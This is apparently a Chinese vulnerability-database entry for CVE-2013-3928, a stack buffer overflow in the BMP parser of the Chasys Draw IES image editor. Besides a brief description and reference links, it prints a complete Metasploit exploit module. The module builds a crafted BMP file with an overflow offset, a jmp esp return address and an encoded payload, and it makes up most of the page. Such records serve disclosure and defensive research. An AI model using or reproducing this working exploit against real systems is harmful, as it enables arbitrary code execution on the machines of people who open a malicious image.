Chasys Draw IES 基于栈的缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121818 漏洞类型 缓冲区溢出
发布时间 2013-08-15 更新时间 2013-08-15
CVE编号 CVE-2013-3928 CNNVD-ID CNNVD-201307-577
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/27609
https://www.securityfocus.com/bid/61463
https://cxsecurity.com/issue/WLB-2013080125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-577
|漏洞详情
ChasysDrawIES是肯尼亚JohnPaulChacha实验室的一套基于层与动画的图像编辑软件。该软件具有界面直观、支持多种输出类型等特点。ChasysDrawIES4.10.01及之前版本的flt_BMP.dll文件的‘ReadFile’函数中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助BMP文件中特制的biPlanes和biBitCount字段利用该漏洞执行任意代码。
|漏洞EXP
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Chasys Draw IES Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in Chasys Draw IES
        (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
        parsing BMP files, where the ReadFile function is used to store user provided data
        on the  stack in a insecure way. It results in arbitrary code execution under the
        context of the user viewing a specially crafted BMP file. This module has been
        tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
        SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Christopher Gabriel',     # Vulnerability Discovery
          'Longinos Recuero Bustos', # PoC
          'Javier \'soez\'',         # PoC
          'juan vazquez'             # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3928' ],
          [ 'BID', '61463' ],
          [ 'URL', 'http://secunia.com/advisories/53773/' ],
          [ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ]
        ],
      'Payload'        =>
        {
          'Space'       => 21112, # Indeed there is more space available on the stack, just limited by the trigger
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 65536,
              'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 26 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.bmp']),
      ], self.class)

  end

  def exploit

    bof = rand_text(target['Offset'])
    bof << [target.ret].pack("V")
    bof << payload.encoded

    bitmap_header = ""
    bitmap_header << [0x28].pack("V")       # HeaderSize
    bitmap_header << [0x4a3].pack("V")      # Width    # Used to trigger the overflow
    bitmap_header << [0x1].pack("V")        # Height
    bitmap_header << [0x9].pack("v")        # Planes   # Used to trigger the overflow
    bitmap_header << [0x41].pack("v")       # BitCount # Used to trigger the overflow
    bitmap_header << [0x0].pack("V")        # Compression
    bitmap_header << [bof.length].pack("V") # SizeImage
    bitmap_header << [0x0].pack("V")        # PelsPerMeterX
    bitmap_header << [0x0].pack("V")        # PelsPerMeterY
    bitmap_header << [0x0].pack("V")        # ClrUse
    bitmap_header << [0x0].pack("V")        # ClrImportant

    total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

    file_header = ""
    file_header << "BM"                     # Signature
    file_header << [total_size].pack("V")   # Size
    file_header << [0].pack("V")            # Reserved
    file_header << [0x36].pack("V")         # BitsOffsets

    bmp = file_header + bitmap_header + bof
    file_create(bmp)
  end
end
|参考资料

来源:docs.google.com
链接:https://docs.google.com/file/d/0BzyiGAtMizMtSFF4ZWVCMHNVVGs/edit?usp=sharing
来源:XF
名称:chasysdrawies-cve20133928-fltbmp-bo(86035)
链接:http://xforce.iss.net/xforce/xfdb/86035
来源:BID
名称:61463
链接:http://www.securityfocus.com/bid/61463
来源:www.jpchacha.com
链接:http://www.jpchacha.com/chasysdraw/help.php?file=history.htm
来源:EXPLOIT-DB
名称:27609
链接:http://www.exploit-db.com/exploits/27609
来源:SECUNIA
名称:53773
链接:http://secunia.com/advisories/53773
来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/122810/Chasys-Draw-IES-Buffer-Overflow.html
来源:longinox.blogspot.com
链接:http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html